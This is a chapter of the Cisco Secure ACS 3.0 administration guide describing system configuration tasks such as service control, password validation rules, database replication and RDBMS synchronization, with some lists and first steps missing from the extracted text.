Table of Contents

Establishing Cisco Secure ACS System Configuration

This chapter addresses the features found in the System Configuration section of Cisco Secure Access Control Server for Windows NT/2000 Servers Version 3.0 (Cisco Secure ACS).

It contains the following topics:

Service Control

Cisco Secure ACS comprises several Windows NT/2000 services. The Service Control page provides basic status information about the services, enables you to configure the service log files, and to stop or restart the services. For more information about Cisco Secure ACS services, see "Cisco Secure ACS Internal Architecture."

This section contains procedures for the following subjects:

You can also configure Cisco Secure ACS service logs. For more information, see the "Configuring Service Logs" section.

Determining the Status of Cisco Secure ACS Services

You can determine whether Cisco Secure ACS services are running or stopped by accessing the Service Control page.

To determine the status of Cisco Secure ACS services, follow these steps:

Step 2   Click Service Control.

Result: The status of the services appears in the CiscoSecure ACS on hostname table, where hostname is the name of the Cisco Secure ACS server.

Stopping, Starting, or Restarting Services

You can stop, start, or restart Cisco Secure ACS services as needed. This achieves the same result as starting and stopping Cisco Secure ACS services from within Windows NT/2000 Control panel. This stops, starts, or restarts the Cisco Secure ACS services except for CSAdmin, which is responsible for the HTML interface.

Note    If the CSAdmin service needs to be restarted, you can do so using the Control Panel Services applet; however, it is best to allow Cisco Secure ACS to handle the services because there are dependencies in the order in which the services are started.

To stop, start, or restart Cisco Secure ACS services, follow these steps:

Step 2   Click Service Control.

Result: The status of the services appears in the CiscoSecure ACS on hostname table, where hostname is the name of the Cisco Secure ACS server.

If the services are running, the Restart and Stop buttons appear at the bottom of the page.

If the services are stopped, the Start button appears at the bottom of the page.

Step 3   Click Stop, Start, or Restart, as applicable.

Result: The status of Cisco Secure ACS services changes to the state appropriate to the button you clicked.

Logging

Cisco Secure ACS generates comma-separated value by default, or ODBC log files if so configured, for the administrative and accounting events for the protocols and options you have enabled. For more information, including configuration steps, see "Working with Logging and Reports."

Date Format Control

Cisco Secure ACS allows for one of two possible date formats in its logs, reports, and administrative interface. You can choose either a month/day/year format or a day/month/year format.

Setting the Date Format

Note   If you have reports that were generated before you changed the date format, be sure to move or rename them to avoid conflicts. For example, if you are using the month/day/year format, Cisco Secure ACS assigns the name 2001-07-12.csv to a report generated on July 12, 2001. If you subsequently change to the day/month/year format, on December 7, 2001, Cisco Secure ACS creates a file also named 2001-07-12.csv and overwrites the existing file.

To set the date format, follow these steps:

Step 2   Click Date Format Control.

Result: Cisco Secure ACS displays the Date Format Selection table.

Step 3   Select a date format option.

Step 4   Click Submit & Restart.

Result: Cisco Secure ACS restarts its services and implements the date format you selected.

Note   For the new date format to be seen in the HTML interface reports, you must restart the connection to the Cisco Secure ACS server. Click the Logoff button (a button with an X) in the upper-right corner of the browser window.

Password Validation

The Password Validation option enables you to configure validation parameters for user passwords. Cisco Secure ACS enforces these rules when an administrator changes a user password in the CiscoSecure user database and when a user attempts to change passwords using the CiscoSecure Authentication Agent applet.

Note   Password validation options apply only to user passwords stored in the CiscoSecure user database. They do not apply to passwords in user records kept in external user databases nor do they apply to enable or admin passwords for Cisco IOS network devices.

Setting Password Validation Options

The password validation options are listed below:

To configure password validation options, follow these steps:

Step 2   Click Password Validation.

Result: The Password Validation Options page appears.

Step 3   In Password length between X and Y characters, type the minimum valid number of characters for a password in the X box.

Step 4   In Password length between X and Y characters, type the maximum valid number of characters for a password in the Y box.

Step 5   To disallow passwords that contain the username, select the Password may not contain the username check box.

Step 6   To require that a user's password must be different than the user's previous password, select the Password is different from the previous value check box.

Step 7   To require that passwords must contain both letters and numbers, select the Password must be alphanumeric check box.

Step 8   Click Submit.

Result: Cisco Secure ACS restarts its services and implements the password validation settings you specified.

CiscoSecure Database Replication

This section provides information about the CiscoSecure Database Replication feature, including procedures for implementing this feature and configuring the Cisco Secure ACS servers involved. This section contains the following topics:

About CiscoSecure Database Replication

Database replication helps make your AAA environment more fault tolerant. Database replication helps create mirror systems of Cisco Secure ACS servers by duplicating parts of the primary Cisco Secure ACS server setup to one or more secondary Cisco Secure ACS servers. You can configure your AAA clients to use these secondary Cisco Secure ACS servers if the primary Cisco Secure ACS server fails or is unreachable. With a secondary Cisco Secure ACS server whose CiscoSecure database is a replica of the primary Cisco Secure ACS server's CiscoSecure database, if the primary Cisco Secure ACS server goes out of service, incoming requests are authenticated without network downtime, provided that your AAA clients are configured to failover to the secondary Cisco Secure ACS server.

Database replication allows you to do the following:

With regard to database replication, we make the following distinctions about Cisco Secure ACS servers:

A Cisco Secure ACS server can be both a primary server and a secondary server, provided that it is not configured to be a secondary server to a Cisco Secure ACS server for which it performs as a primary server. Bidirectional replication, wherein an Cisco Secure ACS server both sends database components to and receives database components from the same remote Cisco Secure ACS server, is not supported.

Note   All Cisco Secure ACS servers involved in replication must run the same release of the Cisco Secure ACS software, including patch level. For example, if the primary Cisco Secure ACS server is running Cisco Secure ACS version 3.0.1, all secondary Cisco Secure ACS servers should be running Cisco Secure ACS version 3.0.1.

Replication Process

The database replication process in this section describes the interaction between a primary Cisco Secure ACS server and a secondary Cisco Secure ACS server. This process occurs between a primary Cisco Secure ACS server and each of its secondary Cisco Secure ACS servers.

The database replication process begins when the primary Cisco Secure ACS server compares the list of database components it is configured to replicate with the list of database components each secondary Cisco Secure ACS server is configured to replicate. The primary Cisco Secure ACS server only replicates those database components that it is configured to send and that the secondary Cisco Secure ACS server is configured to receive. If the secondary Cisco Secure ACS server is not configured to receive any of the components that the primary Cisco Secure ACS server is configured to send, the database replication is aborted.

After the primary Cisco Secure ACS server has determined which components to send to the secondary Cisco Secure ACS server, the replication process continues on the primary Cisco Secure ACS server as follows:

1. The primary Cisco Secure ACS server stops its authentication and creates a copy of the CiscoSecure database components that it is configured to replicate. During this step, if AAA clients are configured properly, those that usually use the primary Cisco Secure ACS server failover to another Cisco Secure ACS server.

2. The primary Cisco Secure ACS server resumes its authentication service. It also compresses and encrypts the copy of its database components for transmission to the secondary Cisco Secure ACS server.

3. The primary Cisco Secure ACS server transmits the compressed, encrypted copy of its database components to the secondary Cisco Secure ACS server. This transmission occurs over a TCP connection, using port 2000. The TCP session uses an encrypted, Cisco-proprietary protocol.

After the preceding events on the primary Cisco Secure ACS server, the database replication process continues on the secondary Cisco Secure ACS server as follows:

1. The secondary Cisco Secure ACS server receives the compressed, encrypted copy of the primary Cisco Secure ACS server's CiscoSecure database components. After transmission of the database components is complete, the secondary Cisco Secure ACS server uncompresses the database components.

2. The secondary Cisco Secure ACS server stops its authentication service and replaces its database components with the database components it received from the primary Cisco Secure ACS server. During this step, if AAA clients are configured properly, those that usually use the secondary Cisco Secure ACS server failover to another Cisco Secure ACS server.

3. The secondary Cisco Secure ACS server resumes its authentication service.

A Cisco Secure ACS server can act as both a primary server and a secondary server. Figure 8-1 shows a cascading replication scenario. Server 1 acts only as a primary Cisco Secure ACS server, replicating to servers 2 and 3, which act as secondary Cisco Secure ACS servers. After replication from server 1 to server 2 has completed, server 2 acts as a primary Cisco Secure ACS server while replicating to servers 4 and 5. Similarly, server 3 acts as a primary Cisco Secure ACS server while replicating to servers 6 and 7.

Replication Frequency

The frequency with which your Cisco Secure ACS servers replicate can have important implications for overall AAA performance. With shorter replication frequencies, a secondary server is more up-to-date with the primary server. This allows for a more current secondary Cisco Secure ACS server if the primary Cisco Secure ACS server fails, including a more current CiscoSecure user database.

There is a cost to having frequent replications. The greater the frequency of replication, the higher the load on a multi-server Cisco Secure ACS architecture and your network environment. Because Cisco Secure ACS transfers replicated data more often, network traffic load is much higher. Also, processing load on the synchronizing systems is increased. Replication consumes system resources, and the more often replication is repeated, the greater the impact on the Cisco Secure ACS server's AAA performance.

This issue is more apparent with large databases or frequently changing databases. Database replication is a non-incremental, destructive backup. In other words, it completely replaces the database and configuration on the secondary Cisco Secure ACS server every time it is run. Therefore, if the database being transferred is large, the amount of data being transferred can be substantial, and the processing overhead can also be large.

Important Implementation Considerations

Several important points bear consideration when implementing the CiscoSecure Database Replication feature:

Database Replication Versus Database Backup

Do not confuse database replication with system backup. Database replication is not a replacement for System Backup. While both features provide protection from partial or complete server loss, each feature addresses the issue in a different way.

System Backup archives data into a format that you can later use to restore the configuration if the system fails or the data becomes corrupted. The backup data is stored on the local hard drive and can be copied and removed from the system for long-term storage. You can store several generations of database backup files.

CiscoSecure Database Replication offers the convenience of copying various components of the CiscoSecure database to other Cisco Secure ACS servers. This can help you plan a failover AAA architecture and can help reduce the complexity of your configuration and maintenance tasks. While it is unlikely, it is possible that CiscoSecure Database Replication can propagate a corrupted database to the Cisco Secure ACS servers that generate your backup files.

Caution   The possibility of backing up a corrupted database exists regardless of whether you use CiscoSecure Database Replication. Because of this small risk, if you are using Cisco Secure ACS in mission-critical environments, we strongly recommend that you implement a backup plan that accounts for this possibility. For more information about backing up the Cisco Secure ACS system or the CiscoSecure database, see the "Cisco Secure ACS Backup" section and "Cisco Secure ACS Command-Line Database Utility."

Database replication provides fairly comprehensive replication of Cisco Secure ACS servers, but it does not replicate all the Cisco Secure ACS setup. Because Cisco Secure ACS relies on several communication dynamic link libraries (DLLs), database replication does not include external authentication sources. Because the system administrator manually determines which DLLs are installed, database replication cannot rely on the necessary DLLs being present on the replication partners. Use the Cisco Secure ACS System Backup feature to back up these parts of the Cisco Secure ACS configuration.

Database Replication Logging

Regardless of whether replication events are successful or not, Cisco Secure ACS logs all replication events in two files:

To view the Windows NT/2000 Event Log, use the Windows NT/2000 administration utilities. You can view recent reports in the Reports and Activity section of Cisco Secure ACS.

For more information about Cisco Secure ACS reports, see "Working with Logging and Reports."

Replication Options

The Cisco Secure ACS HTML interface provides three sets of options for configuring CiscoSecure Database Replication:

Replication Components Options

You can specify both the CiscoSecure database components that a Cisco Secure ACS server sends as a primary Cisco Secure ACS server and the components that it receives as a secondary Cisco Secure ACS server. To create a mirror system, all items must be selected.

Note   The CiscoSecure database components received by a secondary Cisco Secure ACS server overwrite the secondary Cisco Secure ACS server's own CiscoSecure database components. Any information unique to the overwritten database component is lost.

The options that control the components replicated appear in the Replication Components table on the CiscoSecure Database Replication page and are as follows:

If mirroring the entire database with a secondary Cisco Secure ACS server might send confidential information, such as the proxy distribution table, you can configure the primary Cisco Secure ACS server to send only a specific category of database information.

Note   Cisco Secure ACS does not replicate server certificates used for EAP-TLS authentication. Certificates are unique to a server; therefore, they are excluded from the replication process.

Replication Scheduling Options

You can specify when CiscoSecure database replication occurs. The options that control when replication occurs appear in the Replication Scheduling table on the CiscoSecure Database Replication page and are as follows:

Replication Partners Options

You can specify the Cisco Secure ACS servers for which a Cisco Secure ACS performs as a primary Cisco Secure ACS server or as a secondary Cisco Secure ACS server. The options that control the Cisco Secure ACS servers with which a Cisco Secure ACS server is involved for replication appear in the Replication Partners table on the CiscoSecure Database Replication page and are as follows:

For more information about the AAA Servers table in Network Configuration, see the "AAA Server Configuration" section.

Implementing Primary and Secondary Replication Setups on Cisco Secure ACS Servers

If you implement a replication scheme that uses cascading replication, the Cisco Secure ACS server configured to replicate only when it has received replicated components from another Cisco Secure ACS server acts both as a primary Cisco Secure ACS server and as a secondary Cisco Secure ACS server. First, it acts as a secondary Cisco Secure ACS server while it receives replicated components, and then it acts as a primary Cisco Secure ACS while it replicates components to other Cisco Secure ACS servers. For an illustration of cascade replication, see Figure 8-1.

To implement primary and secondary replication setups on Cisco Secure ACS servers, follow these steps:

For more information about adding entries to the AAA Servers table, see the "AAA Server Configuration" section.

Step 2   On the primary Cisco Secure ACS server, follow these steps:

For more information about adding entries to the AAA Servers table, see the "AAA Server Configuration" section.

Configuring a Secondary Cisco Secure ACS Server

Note   If this feature does not appear, click Interface Configuration, click Advanced Options, and select the CiscoSecure ACS Database Replication check box. Also, verify that the Distributed System Settings check box is selected; if not, select the Distributed System Settings check box.

The CiscoSecure Database Replication feature requires that you configure Cisco Secure ACS servers that are to receive replication components, that is, that you configure Cisco Secure ACS servers to act as secondary Cisco Secure ACS servers. The components that a secondary Cisco Secure ACS server is to receive must be explicitly specified, as must be its primary Cisco Secure ACS server or servers.

Replication is always initiated by the primary Cisco Secure ACS server. For more information about sending replication components, see the "Replicating Immediately" section or the "Scheduling Replication" section.

Caution   The CiscoSecure database components received by a secondary Cisco Secure ACS server overwrite the secondary Cisco Secure ACS server's own CiscoSecure database components. Any information unique to the overwritten database component is lost.

To configure a Cisco Secure ACS server to be a secondary Cisco Secure ACS server, follow these steps:

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.

Result: The Database Replication Setup page appears.

Step 4   Select the Receive check box for each database component to be received from a primary Cisco Secure ACS server.

For more information about replication components, see the "Replication Components Options" section.

Step 5   If the secondary Cisco Secure ACS server is to receive replication components from only one primary Cisco Secure ACS server, from the Accept replication from list, select the other Cisco Secure ACS server name.

---

Note    The primary Cisco Secure ACS servers available in the Accept replication from list is determined by the AAA Servers table in the Network Configuration section. For more information about the AAA Servers table, see the "AAA Server Configuration" section.

---

Step 6   If the secondary Cisco Secure ACS server is to receive replication components from more than one primary Cisco Secure ACS server, from the Accept replication from list, select Any Known CiscoSecure ACS for Windows 2000/NT Server.

The Any Known CiscoSecure ACS for Windows 2000/NT Server option is limited to the Cisco Secure ACS servers listed in the AAA Servers table in Network Configuration.

Step 7   Click Submit.

Result: Cisco Secure ACS saves the replication configuration, and at the frequency or times you specified, Cisco Secure ACS begins accepting the replicated components from the other Cisco Secure ACS servers you specified.

Replicating Immediately

You can manually start database replication.

Note   Replication cannot occur until you have configured at least one secondary Cisco Secure ACS server. For more information about configuring a secondary Cisco Secure ACS server, see the "Configuring a Secondary Cisco Secure ACS Server" section.

To initiate database replication immediately, follow these steps:

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and select the CiscoSecure ACS Database Replication check box. Also, verify that the Distributed System Settings check box is selected; if not, select the Distributed System Settings check box.

---

Result: The Database Replication Setup page appears.

Step 4   For each CiscoSecure database component you want to replicate to a secondary Cisco Secure ACS server, under Replication Components, select the corresponding Send check box.

Step 5   For each secondary Cisco Secure ACS that you want the primary Cisco Secure ACS server to replicate its select components to, select the secondary Cisco Secure ACS server from the AAA Servers list, and then click —> (right arrow button).

Step 6   To remove secondary Cisco Secure ACS servers from Replication list, select the secondary Cisco Secure ACS server in the Replication list, and then click <— (left arrow button).

Result: The selected secondary Cisco Secure ACS server appears in the AAA Servers list.

Step 7   At the bottom of the browser window, click Replicate Now.

Result: Cisco Secure ACS saves the replication configuration. Cisco Secure ACS immediately begins sending replicated database components to the secondary Cisco Secure ACS servers you specified.

Scheduling Replication

You can schedule when a primary Cisco Secure ACS server sends its replication components to a secondary Cisco Secure ACS server. For more information about replication scheduling options, see the "Configuring a Secondary Cisco Secure ACS Server" section.

Note   Replication cannot occur until the secondary Cisco Secure ACS servers are configured properly. For more information about receiving replication components, see the "Configuring a Secondary Cisco Secure ACS Server" section.

To schedule when a primary Cisco Secure ACS server replicates to its secondary Cisco Secure ACS servers, follow these steps:

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and select the CiscoSecure ACS Database Replication check box. Also, verify that the Distributed System Settings check box is selected; if not, select the Distributed System Settings check box.

---

Result: The Database Replication Setup page appears.

Step 4   To specify which CiscoSecure database components the primary Cisco Secure ACS server is to send to its secondary Cisco Secure ACS servers, under Replication Components, select the corresponding Send check box for each database component to be sent.

For more information about replication components, see the "Replication Components Options" section.

Step 5   To have the primary Cisco Secure ACS server send replication components to its secondary Cisco Secure ACS servers at regular intervals, under Replication Scheduling, select the Every X minutes option and in the X box type the length of the interval at which Cisco Secure ACS should perform replication.

---

Note    Because Cisco Secure ACS is momentarily shut down during replication, a short replication interval may cause frequent failover of your AAA clients to other Cisco Secure ACS servers. If AAA clients are not properly configured to failover to other Cisco Secure ACS servers, the brief interruption in authentication service may prevent users from authenticating.

---

Step 6   To schedule times at which the primary Cisco Secure ACS server sends its replication components to its secondary Cisco Secure ACS servers, follow these steps:

Tip Clicking times of day on the graph selects those times; clicking again clears them. At any time you can click Clear All to clear all hours, or you can click Set All to select all hours.

Step 7   To have the primary Cisco Secure ACS server send replication components immediately upon receiving replication components from another Cisco Secure ACS server, select the Automatically triggered cascade option.

---

Note    If you specify the Automatically triggered cascade option, you must configure another Cisco Secure ACS server to act as a primary Cisco Secure ACS server to this server; otherwise, this Cisco Secure ACS server never replicates to its secondary Cisco Secure ACS servers.

---

Step 8   To specify the secondary Cisco Secure ACS servers for the primary Cisco Secure ACS server, follow these steps:

---

Note    For more information about replication partners, see the "Replication Partners Options" section.

---

---

Note    The secondary Cisco Secure ACS servers available in the AAA Servers list is determined by the AAA Servers table in Network Configuration. For more information about the AAA Servers table, see the "AAA Server Configuration" section.

---

Result: The selected secondary Cisco Secure ACS server moves to the Replication list.

Step 9   Click Submit.

Result: Cisco Secure ACS saves the replication configuration you created.

Disabling CiscoSecure Database Replication

You can disable scheduled CiscoSecure database replications without losing the schedule itself. This allows you to cease scheduled replications temporarily and later resume them without having to re-enter the schedule information.

To disable CiscoSecure database replication, follow these steps:

Step 2   In the navigation bar, click System Configuration.

Step 3   Click CiscoSecure Database Replication.

Result: The Database Replication Setup page appears.

Step 4   In the Replication Components table, clear all check boxes.

Step 5   In the Replication Scheduling table, select the Manually option.

Step 6   Click Submit.

Result: Cisco Secure ACS does not permit any replication to or from this Cisco Secure ACS server.

Database Replication Event Error Alert Notification

If replication fails, Cisco Secure ACS displays an error message in red at the top of the Database Replication page. In addition to error notification, the message also displays the error code generated by the last unsuccessful run and suggests you check the error log messages generated for previous failures. To acknowledge and close the message, click OK.

RDBMS Synchronization

This section provides information about the RDBMS Synchronization feature, including procedures for implementing this feature, both within Cisco Secure ACS and the external data source involved. This section contains the following topics:

About RDBMS Synchronization

The RDBMS Synchronization feature provides the ability to update the CiscoSecure user database with information from an ODBC-compliant data source. The ODBC-compliant data source can be the RDBMS database of a third-party application. It can also be an intermediate file or database that a third-party system updates. Regardless of where the file or database resides, Cisco Secure ACS reads the file or database via the ODBC connection. You can also regard RDBMS Synchronization as an API—anything you can configure for a user, group, or device through the Cisco Secure ACS HTML interface, you can alternatively maintain through this feature. RDBMS Synchronization supports addition, modification, and deletion for all data items it can access.

You can configure synchronization to occur on a regular schedule. You can also perform synchronizations manually, updating the CiscoSecure user database on demand.

Synchronization performed by a single Cisco Secure ACS server can update the internal databases of other Cisco Secure ACS servers, so that you only need configure RDBMS Synchronization on one Cisco Secure ACS server. Communication between Cisco Secure ACS servers for the purposes of RDBMS Synchronization occurs using an encrypted, Cisco-proprietary protocol.

RDBMS Synchronization Components

The RDBMS Synchronization feature comprises two components:

About CSDBSync

The CSDBSync service uses an ODBC system data source name (DSN) to access the accountActions table. See Figure 8-2. It looks specifically for a table named "accountActions". Synchronization events fail if CSDBSync cannot access the accountActions table.

CSDBSync reads each record from the accountActions table and updates the CiscoSecure user database as specified by the action code in the record. For example, a record could instruct CSDBSync to add a user or a change a user's password. After CSDBSync processes each record, it deletes the record from the table.

CSDBSync both reads and writes (deletes records) in the accountActions table. This requires that the database user account that you configure the system DSN to use must have both read and write privileges.

For more information about CSDBSync or other Windows services used by Cisco Secure ACS, see "Cisco Secure ACS Internal Architecture."

About the accountActions Table

The accountActions table contains a set of rows that define actions CSDBSync is to perform in the CiscoSecure user database. Each row in the accountActions table holds user, user group, or AAA client information. Each row also contains an action field and several other fields. These fields provide CSDBSync with the information it needs to update the CiscoSecure user database. For full details of the accountActions table format and available actions, see "ODBC Import Definitions."

The database containing the accountActions table must support a multi-threaded ODBC driver. This is required to prevent problems in the event that Cisco Secure ACS and the third-party system attempt to access the accountActions table simultaneously.

Cisco Secure ACS includes files to help you create your accountActions table for several common formats. You can find these files on the Cisco Secure ACS server in the following location, assuming a default installation of Cisco Secure ACS:

C:\Program Files\CiscoSecure ACS vx.x\CSDBSync\Databases

The Databases directory contains the following subdirectories:

CiscoSecure Transactions.mdb contains a preconfigured accountActions table. When you install Cisco Secure ACS, the installation routine creates a system DSN named CiscoSecure DBSync. This system DSN configured to communicate with CiscoSecure Transactions.mdb.

---

Note    By default, the username and password for the CiscoSecure Transactions.mdb database are set to null. To increase the security of RDBMS synchronizations performed using this database, change the username and password, both in the CiscoSecure Transactions.mdb database and in Cisco Secure ACS. Any other processes that access the CiscoSecure Transactions.mdb database should be changed to use the new username and password, too.

---

The accountactions file is the accountActions table in a comma-separated value file. The schema.ini file provides the Microsoft ODBC text file driver with the information it needs to access the accountactions file.

The accountActions.sql file contains the Oracle 7 SQL procedure needed to generate an accountActions table. The testData.sql file contains Oracle 7 SQL procedures for updating the accountActions table with sample transactions that CSDBSync can process.

The accountActions.sql file contains the Oracle 8 SQL procedure needed to generate an accountActions table. The testData.sql file contains Oracle 8 SQL procedures for updating the accountActions table with sample transactions that CSDBSync can process.

The accountActions.sql file contains the Microsoft SQL Server 6.5 SQL procedure needed to generate an accountActions table. The testData.sql file contains Microsoft SQL Server 6.5 SQL procedures for updating the accountActions table with sample transactions that CSDBSync can process.

Cisco Secure ACS Database Recovery Using the accountActions Table

Because the RDBMS Synchronization feature deletes each record in the ODBC Import table after processing the record, the accountActions table can be considered a transaction queue. The RDBMS Synchronization feature does not maintain a transaction log/audit trail. If a log is required, the external system that adds records to the accountActions table must create it. Unless the external system can recreate the entire transaction history in the accountActions table, we recommend that you construct a transaction log file for recovery purposes. To do this, create a second table that is stored in a safe location and backed up on a regular basis. In that second table, mirror all the additions and updates to records in the accountActions table.

If the database is large, it is not practical to recreate the CiscoSecure user database by replaying the transaction log for the entire history of the system. Instead, create regular backups of the CiscoSecure user database and replay the transaction logs from the time of most recent backup to bring the CiscoSecure user database back in synchronization with the third-party system. For information on creating backup files, see the "Cisco Secure ACS Backup" section.

Replaying transaction logs that slightly predate the checkpoint does not damage the CiscoSecure user database, although some transactions might be invalid and reported as errors. As long as the entire transaction log is replayed, the CiscoSecure user database is consistent with the external RDBMS application's database.

Reports and Event (Error) Handling

The CSDBSync service provides event and error logging. For more information about the RDBMS Synchronization log, see the "RDBMS Synchronization Log" section. For more information about the CSDBSync service log, see the "Service Logs" section.

During manual synchronizations, Cisco Secure ACS provides visual alerts to notify you of problems that occurred during synchronization.

Preparing to Use RDBMS Synchronization

Synchronizing the CiscoSecure user database using data from the accountActions table requires that you complete several significant steps external to Cisco Secure ACS before configuring the RDBMS Synchronization feature within Cisco Secure ACS. If you are planning to use a CSV file as your accountActions table, also see the "Considerations for Using CSV-Based Synchronization" section.

To prepare to use RDBMS Synchronization, follow these steps:

Step 2   Create your accountActions table.

Step 3   Configure your third-party system to generate records and update the accountActions table with them. This will most likely involve creating stored procedures that write to the accountActions table at a triggered event; however, the mechanism for maintaining your accountActions table is unique to your implementation. If the third-party system you are using to update the accountActions table is a commercial product, for assistance, refer to the documentation supplied by your third-party system vendor.

For information about the format and content of the accountActions table, see the "ODBC Import Definitions."

Step 4   Validate your third-party system to ensure that it updates the accountActions table properly. Rows generated in the accountActions table must be valid. For details on the format and content of the accountActions table, see "ODBC Import Definitions."

---

Note    After testing that the third-party system updates the accountActions table properly, discontinue updating the accountActions table until after you have completed Step 5 and Step 6 below.

---

Step 5   Set up a system DSN on the Cisco Secure ACS server. For steps, see the "Configuring a System Data Source Name for RDBMS Synchronization" section.

Step 6   Schedule RDBMS synchronization in Cisco Secure ACS. For steps, see the "Scheduling RDBMS Synchronization" section.

Step 7   Configure your third-party system to begin updating the accountActions table with information to be imported into the CiscoSecure user database.

Step 8   Confirm that RDBMS synchronization is operating properly by monitoring the RDBMS Synchronization report in the Reports and Activity section. For more information about the RDBMS Synchronization log, see the "RDBMS Synchronization Log" section.

Also, monitor the CSDBSync service log. For more information about the CSDBSync service log, see the "Service Logs" section.

Considerations for Using CSV-Based Synchronization

The behavior of the Microsoft ODBC driver for text files creates significant additional considerations if you are planning to use a CSV-based accountActions table. The Microsoft ODBC driver for text files always operates in a read-only mode. It cannot delete records from a CSV accountActions table. Because of this, synchronization events initiated or scheduled in the HTML interface never release the CSV file, so the updates to the accountActions table from your third-party system fail.

The solution is to initiate synchronization events from a script, such as a DOS batch file. In the script, RDBMS synchronization is initiated with the CSDBSync -run command.

Assuming a default installation, CSDBSync.exe is installed at:

After you have written a script that uses the CSDBsync command, you can schedule synchronization events using the Windows at command. For information about the at command, please refer to your Microsoft Windows documentation.

Also, due to limitations of the Microsoft ODBC text file driver, using the CSV format requires a change to the accountactions CSV file shipped with Cisco Secure ACS and to Cisco Secure ACS configuration. For more information, see the "Preparing for CSV-Based Synchronization" section.

Preparing for CSV-Based Synchronization

If you want to use a CSV file for your accountActions table, some additional configuration is necessary. This is because the Microsoft ODBC CSV driver cannot access the accountActions table unless the file has a .csv file extension.

To prepare for RDBMS synchronization using a CSV file, follow these steps:

Assuming a default installation of Cisco Secure ACS, the accountactions file is at the following location:

Step 2   Edit the Windows registry:

Step 3   At a DOS prompt, follow these steps:

and press Enter.

and press Enter.

Result: The Microsoft ODBC CSV driver can now access the accountActions CSV file properly.

Configuring a System Data Source Name for RDBMS Synchronization

On the Cisco Secure ACS server, a system DSN must exist for Cisco Secure ACS to access the accountActions table. If you plan to use the CiscoSecure Transactions.mdb Microsoft Access database provided with Cisco Secure ACS, you can use the CiscoSecure DBSync system DSN rather than creating one.

For more information about the CiscoSecure Transactions.mdb file, see the "Preparing to Use RDBMS Synchronization" section.

To create a system DSN for use with RDBMS synchronization, follow these steps:

Step 2   In the ODBC Data Source Administrator window, click the System DSN tab.

Step 3   Click Add.

Step 4   Select the driver you need to use with your new DSN, and then click Finish.

Result: A dialog box displays fields requiring information specific to the ODBC driver you selected.

Step 5   In the Data Source Name box, type a descriptive name for the DSN.

Step 6   Complete the other fields required by the ODBC driver you selected. These fields may include information such as the IP address of the server on which the ODBC-compliant database runs.

Step 7   Click OK.

Result: The name you assigned to the DSN appears in the System Data Sources list.

Step 8   Close the ODBC window and Windows Control Panel.

Result: The System DSN to be used by Cisco Secure ACS to access your accountActions table is created on your Cisco Secure ACS server.

RDBMS Synchronization Options

The RDBMS Synchronization Setup page, available from System Configuration, provides control of the following items:

RDBMS Setup Options

The RDBMS Synchronization feature provides the following RDBMS setup options:

---

Note    The database user account specified by the username must have sufficient privileges to read and write to the accountActions table.

---

Synchronization Scheduling Options

The RDBMS Synchronization feature provides the following scheduling options:

Synchronization Partners Options

The RDBMS Synchronization feature provides the following synchronization partners options:

For more information about the AAA Servers table in Network Configuration, see the "AAA Server Configuration" section.

Performing RDBMS Synchronization Immediately

You can manually start an RDBMS synchronization event.

To perform manual RDBMS synchronization, follow these steps:

Step 2   Click RDBMS Synchronization.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the RDBMS Synchronization check box.

---

Result: The RDBMS Synchronization Setup page appears.

Step 3   To specify options in the RDBMS Setup table, follow these steps:

---

Note    For more information about RDBMS setup, see the "RDBMS Setup Options" section.

---

For more information about configuring a system DSN for use with RDBMS Synchronization, see the "Configuring a System Data Source Name for RDBMS Synchronization" section.

Result: Cisco Secure ACS has the information necessary to access the accountActions table.

Note   It is not necessary to select Manually under Replication Scheduling. For more information, see the "Disabling Scheduled RDBMS Synchronizations" section.

Step 4   For each Cisco Secure ACS that you want this Cisco Secure ACS server to update with data from the accountActions table, select the Cisco Secure ACS server in the AAA Servers list, and then click —> (right arrow button).

Result: The selected Cisco Secure ACS server appears in the Synchronize list.

Step 5   To remove Cisco Secure ACS servers from Synchronize list, select the Cisco Secure ACS server in the Synchronize list, and then click <— (left arrow button).

Result: The selected Cisco Secure ACS server appears in the AAA Servers list.

Step 6   At the bottom of the browser window, click Synchronize Now.

Result: Cisco Secure ACS immediately begins a synchronization event. To check on the status of the synchronization, view the RDBMS Synchronization report in Reports and Activity.

Scheduling RDBMS Synchronization

You can schedule when a Cisco Secure ACS server performs RDBMS synchronization.

To schedule when a Cisco Secure ACS server performs RDBMS synchronization, follow these steps:

Step 2   Click RDBMS Synchronization.

---

Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the RDBMS Synchronization check box.

---

Result: The RDBMS Synchronization Setup page appears.

Step 3   To specify options in the RDBMS Setup table, follow these steps:

---

Note    For more information about RDBMS setup, see the "RDBMS Setup Options" section.

---

For more information about configuring a system DSN for use with RDBMS Synchronization, see the "Configuring a System Data Source Name for RDBMS Synchronization" section.

Step 4   To have this Cisco Secure ACS server perform RDBMS synchronization at regular intervals, under Synchronization Scheduling, select the Every X minutes option and in the X box type the length of the interval at which Cisco Secure ACS should perform synchronization.

Step 5   To schedule times at which this Cisco Secure ACS server performs RDBMS synchronization, follow these steps:

Tip Clicking times of day on the graph selects those times; clicking again clears them. At any time you can click Clear All to clear all hours, or you can click Set All to select all hours.

Step 6   For each Cisco Secure ACS server you want to synchronize with data from the accountActions table, follow these steps:

---

Note    For more information about synchronization targets, see the "Replication Partners Options" section.

---

---

Note    The Cisco Secure ACS servers available in the AAA Servers list is determined by the AAA Servers table in Network Configuration, with the addition of the name of the current Cisco Secure ACS server. For more information about the AAA Servers table, see the "AAA Server Configuration" section.

---

Result: The selected Cisco Secure ACS server moves to the Synchronize list.

Note   At least one Cisco Secure ACS server must be in the Synchronize list. This includes the server on which you are configuring RDBMS Synchronization. RDBMS Synchronization does not automatically include the current server's internal database.

Step 7   Click Submit.

Result: Cisco Secure ACS saves the RDBMS synchronization schedule you created.

Disabling Scheduled RDBMS Synchronizations

You can disable scheduled RDBMS synchronization events without losing the schedule itself. This allows you to cease scheduled synchronizations temporarily and later resume them without having to re-enter the schedule information.

To disable scheduled RDBMS synchronizations, follow these steps:

Step 2   Click RDBMS Synchronization.

Result: The RDBMS Synchronization Setup page appears.

Step 3   Under Synchronization Scheduling, select the Manually option.

Step 4   Click Submit.

Result: Cisco Secure ACS does not perform scheduled RDBMS synchronizations.

